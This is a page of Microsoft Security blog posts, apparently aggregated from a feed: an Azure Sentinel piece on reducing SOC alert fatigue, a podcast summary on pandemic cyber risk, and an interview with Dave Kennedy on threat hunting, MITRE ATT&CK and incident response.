Today, organizations are faced with the increasingly difficult task of trying to protect their expanding digital estate from sophisticated cybersecurity threats. Migration to the cloud and a mobile workforce has dissolved the network boundary and projected the digital estate beyond its traditional confines. Data, users, and systems are everywhere. Additionally, these systems are increasingly domiciled in the cloud and generating a considerable amount of security data. To add to this, on average, companies with over 1,000 employees maintain about 70 security products from 35 different vendors, according to a recent report by CCS Insight. The end result? A vast amount of alerts that security operations center (SOC) teams have to contend with. Unsurprisingly, according to an ESG¹ study, 44 percent of these alerts go uninvestigated due to a combination of talent scarcity and the multiplicity of security solutions generating a huge volume of alerts.

To help our customers address alert fatigue but still maintain detection efficacy, Microsoft is leveraging the power of Threat Intelligence, native solution integration, AI, and automation to deliver a unique SIEM and XDR approach—to help tackle the challenge of alert fatigue. But first things first—what exactly are alerts, events, and incidents in the context of security operations? Below is a graphic that will help answer this question before we delve deeper into how Microsoft technology is helping SOC teams sift through high volumes of alerts and narrow down to manageable high-fidelity incidents.

Let us now look at the six strategies that Microsoft employs to help our customers deal with the alert fatigue problem:

1. Threat intelligence

To combat cyberthreats, Microsoft amalgamates trillions of daily signals, across all clouds and all platforms, for a holistic view of the global security ecosystem. Using the latest in machine learning and artificial intelligence techniques—plus the power of smart humans—we put these signals to work on behalf of our customers taking automated actions when threats are detected, and providing actionable intelligence to security teams when further contextual analysis is required.

2. Native integration

Microsoft leverages the tight integration across its threat protection solution stack to help customers connect the dots between disparate threat signals and develop incidents by grouping quality alerts from different parts of their environment and stitching together the elements of a threat. First-party security solutions within the Microsoft 365 Defender offering enable our customers to benefit from real-time interactions amongst the tools, backed by insights from the Intelligent Security Graph. As a result, the quality of alerts is improved, false positives are significantly reduced at source, and in some cases, automatic remediation is completed at the threat protection level. Additionally, this can be combined with log data drawn from third-party solutions such as network firewalls and other Microsoft solutions to deliver an end-to-end investigation and remediation experience, as depicted in the image below.

3. Machine learning

The third strategy that we employ is the ingestion of billions of signals into our security information and event management (SIEM) solution (Azure Sentinel) then passing those signals through proven machine learning models. Machine Learning is at the heart of what makes Azure Sentinel a game-changer in the SOC, especially in terms of alert fatigue reduction. With Azure Sentinel we are focusing on three machine learning pillars: Fusion, Built-in Machine Learning, and “Bring your own machine learning.” Our Fusion technology uses state-of-the-art scalable learning algorithms to correlate millions of lower fidelity anomalous activities into tens of high fidelity incidents. With Fusion, Azure Sentinel can automatically detect multistage attacks by identifying combinations of anomalous behaviors and suspicious activities that are observed at various stages of the kill-chain.

On the basis of these discoveries, Azure Sentinel generates incidents that would otherwise be difficult to catch. Secondly, with built-in machine learning, we pair years of experience securing Microsoft and other large enterprises with advanced capabilities around techniques such as transferred learning to bring machine learning to the reach of our customers, allowing them to quickly identify threats that would be difficult to find using traditional methods. Thirdly, for organizations with in-house capabilities to build machine learning models, we allow them to bring those into Azure Sentinel to achieve the same end-goal of alert noise reduction in the SOC. Below is a real-life depiction captured within a certain month where machine learning in Azure Sentinel was used effectively to reduce signal noise.

4. Watchlists

Watchlists ensure that alerts with the listed entities are promoted, either by assigning them a higher severity or by alerting only on the entities defined in the watchlist. Among other use-cases, Azure Sentinel leverages Watchlists as a high-fidelity data source that can be used to reduce alert fatigue. For example, this is achieved by creating “allow” lists to suppress alerts from a group of users or devices that perform tasks that would normally trigger the alert, thereby preventing benign events from becoming alerts.


User and entity behavior analytics (UEBA) is natively built into Azure Sentinel targeting use-cases such as abuse of privileged identities, compromised entities, data exfiltration, and insider threat detection. Azure Sentinel collects logs and alerts from all of its connected data sources, then analyzes them and builds baseline behavioral profiles of your organization’s entities (users, hosts, IP addresses, applications, and more) across peer groups and time horizons. With the UEBA capability, SOC analysts are now empowered to reduce not just false positives but also false negatives. UEBA achieves this by automatically leveraging contextual and behavioral information from peers and the organization that typical alert rules tend to lack. The image below depicts how UEBA in Azure Sentinel narrows down to only the security-relevant data to improve detection efficiency:

6. Automation

The lower tiers of a SOC are typically tasked with triaging alerts, and this is where the critical decisions need to be made as to whether alerts are worth investigating further or not. It is also at this point that automation of well-known tasks that do not require human judgment can have the most significant impact in terms of alert noise reduction. Azure Sentinel leverages Logic Apps native to Azure to build playbooks that automate tasks of varying complexity. Using real-time automation, response teams can significantly reduce their workload by fully automating routine responses to recurring types of alerts, allowing SOC teams to concentrate more on unique alerts, analyzing patterns, or threat hunting. Below is an example of a security playbook that will open a ticket in ServiceNow and send a message to an approver. With a click of a button, if they confirm activity from a malicious IP as a true positive, then automatically that IP is blocked at the firewall level, and the user’s ID is disabled in Azure Active Directory.


We have looked at 6 effective strategies that organizations can use to minimize alert fatigue and false positives in the SOC. When combined together across a unified ecosystem including Threat Intelligence, the Microsoft Security suite, UEBA, automation, and orchestration capabilities tightly integrated with the Azure platform and Azure Sentinel alert noise can be significantly reduced. Additionally, Azure Sentinel offers capabilities such as alert grouping and the intuitive Investigation Graph which automatically surfaces prioritized alerts for investigation and also provides automated expert guidance when investigating incidents. To significantly increase your detection rates and reduce false positives while simplifying your security infrastructure, including our unique SIEM and XDR solution comprising Azure Sentinel and Microsoft Defender capabilities into your threat defense and response strategy.

Additional resources

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Special thanks to Sarah Young, Chi Nguyen, Ofer Shezaf, and Rafik Gerges for their input. 

¹ESG: Security Analytics and Operations: Industry Trends in the Era of Cloud Computing 2019.

The post 6 strategies to reduce cybersecurity alert fatigue in your SOC appeared first on Microsoft Security.

Afternoon Cyber Tea: Evaluating individual and organizational cyber risk in a pandemic

Microsoft Malware Protection Center - Tue, 02/16/2021 - 2:00pm

Cybersecurity professionals find themselves in high demand as organizations worldwide continue to grapple with how to secure millions of remote workers. James Turner is an industry analyst at CISO Lens and served as an adjudicator from 2017 to 2019 for the Australian government’s cyber war games: Operation Tsunami. In this episode of Afternoon Cyber Tea, James and I talk about how the COVID-19 pandemic has accelerated the critical need for cooperation across the cybersecurity industry, as well as the need for strengthening communication between governments and private organizations.

Our discussion really examines how the pandemic has pushed organizations toward greater cost efficiencies and a new mainstreaming of cybersecurity—democratizing the language and tools to make it part of everyone’s “9 to 5” experience.

“Everyone has a plan until they get hit in the face,” as James puts it. “Ransomware is off the hook—one organization just got hit with a 10 million dollar ransom. That’s more than the average Australian or New Zealand organization spends on security in a year.”

If the old saying that every crisis presents an opportunity holds true, James sees the pandemic as a tremendous catalyst for better information sharing amid budget cuts and a fragmented workforce. “The security operating centers at large banks are on speed-dial with each other because the attack against Company A hits Company B the next day. No organization, or even an entire country, can do it all by themselves.”

During our talk, we also touch on how the pandemic has pushed security professionals to look at new ways of optimizing delivery, such as utilizing an integrated security solution rather than an expensive niche product. “It’s given businesses a new appreciation for automatic patching,” James recounts. “My group of CISOs is discussing installing agents on personal devices; the legalities and logistics around that. Budgets are becoming an issue; so, I’m encouraging them to think like startups—get creative.”

James and I also examine how security professionals need to do a better job of evangelizing across the entire IT sector, including developing a ground-level understanding of your own organization’s business units. Cybersecurity will only be truly effective when it’s no longer part of an org chart but simply part of everyone’s job.

To hear my complete conversation with James Turner, listen to the full episode.

What’s next

In this ongoing podcast series, I talk with cybersecurity influencers about the evolving threat landscape and explore the promise of systems powered by AI, IoT, and other emerging tech. In every episode, we’ll look at empowering people and organizations to create a more secure, productive digital environment.

Listen to Afternoon Cyber Tea with Ann Johnson on:
  • Apple Podcasts: You can also download the episode by clicking the Episode Website link.
  • Podcast One: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Evaluating individual and organizational cyber risk in a pandemic appeared first on Microsoft Security.

A playbook for modernizing security operations

Microsoft Malware Protection Center - Thu, 02/11/2021 - 2:00pm

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post from our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Dave Kennedy, Founder and Chief Technology Officer at Binary Defense. Dave shares his insights on security operations—what these teams need to work effectively, best practices for maturing the security operations center (SOC), as well as the biggest security challenges in the years to come.

Natalia: What are the standard tools, roles, frameworks, and services for a security operations team? What are the basic elements a SecOps team needs to succeed?

Dave: Your security operations team must have visibility into your infrastructure, both on and off-premises. Visibility is key because many of these attacks start with one compromised asset or one compromised credential. They spread across the network and in many cases, they wreak a lot of damage. Your endpoints, network infrastructure, and cloud environments are where a lot of these issues happen. I recommend starting with high-risk areas like your endpoints.

Then, you need somewhere to ingest that data, such as security information and event management systems like Microsoft Azure Sentinel, and to go through log analysis and determine if anything has been compromised.

Also, frameworks like the MITRE ATT&CK framework are a great baseline of saying, well, here are specific attacks that we’ve seen in the wild that are mapped to specific adversaries that are in our industry vertical. That can help you prioritize those, get better at detection, and make sure you have the right logs coming into your environment to build detections.

Natalia: How can a team operationalize the MITRE ATT&CK framework?

Dave: When people first look at the MITRE ATT&CK framework, they freak out because it’s so big, but it’s a treasure trove of information. Everybody was focused on a castle mentality of being able to protect everything but what happens when an attacker is in your environment? Protection is still very important and you want to have protective mechanisms in place, but protection takes time and requires cultural changes in many cases. If you’re doing something like multifactor authentication, you have to communicate that to users.

The MITRE ATT&CK framework tells you what happens when attackers have gotten around your preventive controls. What happens when they execute code onto a system and take other actions that allow them to either extract additional information or move to different systems through lateral movement or post-exploitation scenarios and get access to the data? The MITRE ATT&CK framework is a way to conceptualize exactly what’s happening from an attacker’s standpoint and to build detections around those attack patterns.

With the damage we see, it’s usually several hours, days, or months that an attacker has had access to an environment. If we can shave that time down and detect them in the first few minutes or the first few hours of an attack and shut them down, we’ve saved our company a substantial amount of damage. It’s a framework to help you understand what’s happening in your environment and when unusual activities are occurring so you can respond much more effectively.

Natalia: How much of the MITRE ATT&CK framework should a security team build into their detections? How much should they rely on existing tools to map the framework?

Dave: Many tools today have already done a lot of mapping to things like the MITRE ATT&CK framework, but it’s not comprehensive. If you have an endpoint detection and response product, it may cover only 20 percent of the MITRE ATT&CK framework. Mapping your existing tools and technology to the MITRE ATT&CK framework is a very common practice. For instance, you may have an email gateway that uses sandboxing virtualization techniques that detonate potential malware to see whether it’s effective. That’s one component of your technology stack that can help cover certain components of the MITRE ATT&CK framework. You might have web content filtering that covers a different component of the framework, and then you have endpoint detection and responses (EDRs) that cover a percentage of the endpoint detection pieces.

Technology products can help you shave away the amount of effort that goes into the MITRE ATT&CK framework. It’s really important, though, that organizations map those out to understand where they have gaps and weaknesses. Maybe they need additional technology for better visibility into their environment. I’m a huge fan of the Windows systems service, System Monitor (Sysmon). If you talk to any incident responder, they’ll tell you that if they have access to Sysmon data logs, that’s a treasure trove of information from a threat hunting and incident response perspective.

It’s also important to look at it from an adversary perspective. Not every single adversary in the world wants to target your organization or business. If you’re in manufacturing, for instance, you’re not going to be a target of all adversaries. Look at what the adversaries do and what type of industry vertical they’re targeting so you don’t have to do everything in the MITRE ATT&CK framework. You can whittle the framework down to what’s important for you and build your detections based on which adversaries are most likely to target your organization.

Natalia: If a team has all the basics down and wants to mature their SecOps practices, what do you suggest?

Dave: Most security operations centers are very reactive. Mature organizations are moving toward more proactive hunting or threat hunting. A good example is if you’re sending all of your logs through Azure Sentinel, you can do things like Kusto Query Language and queries in analysis and data sets to look for unusual activity. These organizations go through command line arguments, service creations, parent-child process relationships, or Markov chaining, where you can look at unusual deviations of parent-child process relationships or unusual network activity.

It’s a continual progression starting off with the basics and becoming more advanced over time as you run through new emulation criteria or simulation criteria through either red teaming or automation tools. They can help you get good baselines of your environment and look for unusual traffic that may indicate a potential compromise. Adversary emulations are where you’re imitating a specific adversary attacker through known techniques discovered through data breaches. For example, we look at what happened with the SolarWinds supply chain attack—and kudos to Microsoft for all the research out there—and we say, here are the techniques these specific actors were using, and let’s build detections off of those so they can’t use them again.

More mature organizations already have that in place, and they’re moving toward what we call adversary simulation, where you take a look at an organization’s threat models and you build your attacks and techniques off of how those adversaries would operate. You don’t do it by using the same type of techniques that have previously been discovered. You’re trying to simulate what an attacker would do in an environment and can a blue team identify those.

Natalia: What are best practices for threat hunting?

Dave: Threat hunting varies based on timing and resources. It doesn’t mean you have to have dedicated resources. Threat hunting can be an exercise you conduct once a week, once a month, or once a quarter. It involves going through your data and looking for unusual activity. Look at all service creations. Look at all your command line arguments that are being passed. A large percentage of the MITRE ATT&CK framework can be covered just by parent-child process relationships and command line auditing in the environment. Look at East to West traffic, not just North to South. Look at all your audit logs. Go through Domain Name System (DNS traffic).

For instance, a user was using Outlook and then clicked on an email that opened an Excel document that triggered a macro that then called PowerShell or CMD EXE. That’s an unusual activity that you wouldn’t expect to see from a normal user so let’s hone in on that and figure out what occurred.

You can also conduct more purple teaming engagements, where you have a red team launch attacks and detection teams look through the logs at the same time to build better detections or see where you might have gaps in visibility. Companies that have threat hunting teams make it very difficult for red teamers to get around the different landmines that they’ve laid across the network.

Natalia: What should an incident response workflow look like?

Dave: An alert or unusual activity during a threat hunting exercise is usually raised to somebody to do an analysis. A SOC analyst typically has between 30 seconds and four minutes per alarm to determine whether the alarm is a false positive or something they need to analyze. Obviously, what stands out are things like obfuscation techniques, such as where you have PowerShell with a bunch of code that looks very unusual and obfuscation to try to evade endpoint protection products. Some of the more confusing ones are things like living off the land, which are attacks that leverage legitimate applications that are code signed by the operating system to download files and execute in the future.

A research phase kicks off to see what’s actually going on. If it’s determined that there is malicious activity, usually that’s when incident response kicks in. How bad is it? Have they moved to other systems? Let’s get this machine off the network and figure out everything that’s happening. Let’s do memory analysis. Let’s figure out who the actual attacker was. Can we combine this with red intelligence and determine the specific adversary? What are their capabilities? You start to build the timeline to ensure that you have all the right data and to determine if it’s a major breach or self-contained to one individual system.

We ran several incident response scenarios for customers that were impacted by the supply chain attacks on SolarWinds and the biggest challenge for the customers was their logs didn’t go back that far so it was very difficult for them to say definitively with evidence, that they know what happened.

Natalia: What does an incident responder need to succeed?

Dave: I’d strongly recommend doing an incident response readiness assessment for your organization. I also recommend centralized logging—whether that’s a security information and event management (SIEM) or a data analytics tool or a data lake—that you can comb through. I’m a huge advocate of Sysmon. You can do power execution, command line auditing, DNS traffic, process injection, and parent-child process relationships. I’d also suggest network logs. If you can do full packet captures, which not a lot of organizations can do, that’s also great. If you can pull data packets coming from a secure sockets layer (SSL) or transport layer security (TLS) and do remote memory acquisition, that’s also really important. Can we retrieve artifacts from systems in a very consistent way?

Tabletop exercises can also get executives and IT on the same page about how to handle incidents and work together. Running through very specific types of scenarios can help you figure out where you have gaps or weaknesses. When I was the Chief Security Officer at Diebold, we would run through three to four tabletop exercises a year and include our senior leadership, like our CEO and CFO, twice a year. It was eye-opening for them because they never really understood what goes into incident response and what can happen from a cyber perspective. We’d run through actual simulations and scenarios of very specific attacks and see how they would respond. Those types of scenarios really help build your team’s understanding and determine where you may need better communication, better tooling, or better ways to respond.

Natalia: What other strategies can security operators implement to try to avoid attacks?

Dave: When you look at layered defense, always improving protection is key. You don’t want to just focus on detection because you’re going to be in firefighting mode all the time. The basics really are a big deal: things like multifactor authentication, patch management, and security architecture.

Reducing the attack surface is important, such as with application control and allowed application lists. Application control is probably one of the most effective ways of shutting down most attacks out there today because you have a good baseline of your organization. That applies very consistently to things like the Zero Trust model. Become more of a service provider for your organization versus providing everything for your organization. Reducing your attack surface will eliminate the noise that incident responders or SOC analysts must deal with and allow them to focus on a lot of the high-fidelity type things that we want to see.

One of the things that I see continuously going into a lot of organizations is that they’re just always in firefighting mode, 90 percent of their alarms are false positives, and they’re in alarm fatigue. Their security operations center isn’t improving on detections. You really need somebody on the strategy side to come in and say: Can we lock our users down in a way that doesn’t hinder the business, but also lowers the attack surface?

Natalia: How does vulnerability assessment strategy fit into a SOC strategy?

Dave: Program vulnerabilities and exposures are key opportunities that attackers will use. When we look at historic data breaches, those that use direct exploitation and not phishing were using common vulnerabilities and exposures (CVE) typically of six months or older that allowed them access to a specific system. That makes it really important to reduce attack surfaces and understand where vulnerabilities are so we can make it a lot more difficult for attackers to get in.

It’s not a zero-day attack that’s hitting companies today. It’s out-of-date systems. It’s not patching appropriately. A lot of companies will do well on the operating system side. They’ll patch their Windows machines, their Linux machines, and Apple. But they fail really hard with the third-party applications and especially the web application tier of the house—middleware, microservices. In almost every case, it comes down to ownership of the application. A lot of times, IT will own the operating system platforms and the infrastructure that it’s on, but business owners typically sponsor those applications and so ownership becomes a very murky area. Is it the business owners that own the updates of the applications or does IT? Make sure you have clear owners in charge of making sure patches go out regularly.

If you’re not going through regular vulnerability assessments and looking for the vulnerabilities in your environment, you’re very predisposed to a data breach that attackers would leverage based on missing patches or missing specific security fixes. The first few stages of an attack are the most critical because that’s where most organizations have built their defenses. In the latter phases of post-exploitation, especially as you get to the exfiltration components, most organizations don’t have good detection capabilities. It’s really important to have those detection mechanisms in place ahead of time and ensure those systems are patched.

Natalia: We often discuss the challenges facing security today. Let’s take a different approach. What gives you hope?

Dave: What gives me hope is the shift in security. Ten years ago, we would go into organizations from a penetration testing perspective and just destroy these companies. And then the next year, we’d go in and we’d destroy these companies again. Their focus was always on the technical vulnerabilities and not on what happens after attackers are in your castle. The industry has really shifted toward the mindset of we have to get better at looking for deviations of patterns of behavior to be able to respond much more effectively. The industry is definitely tracking in the right direction, and that really gives me hope.

Learn how Microsoft Security solutions can help modernize Security Operations.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A playbook for modernizing security operations appeared first on Microsoft Security.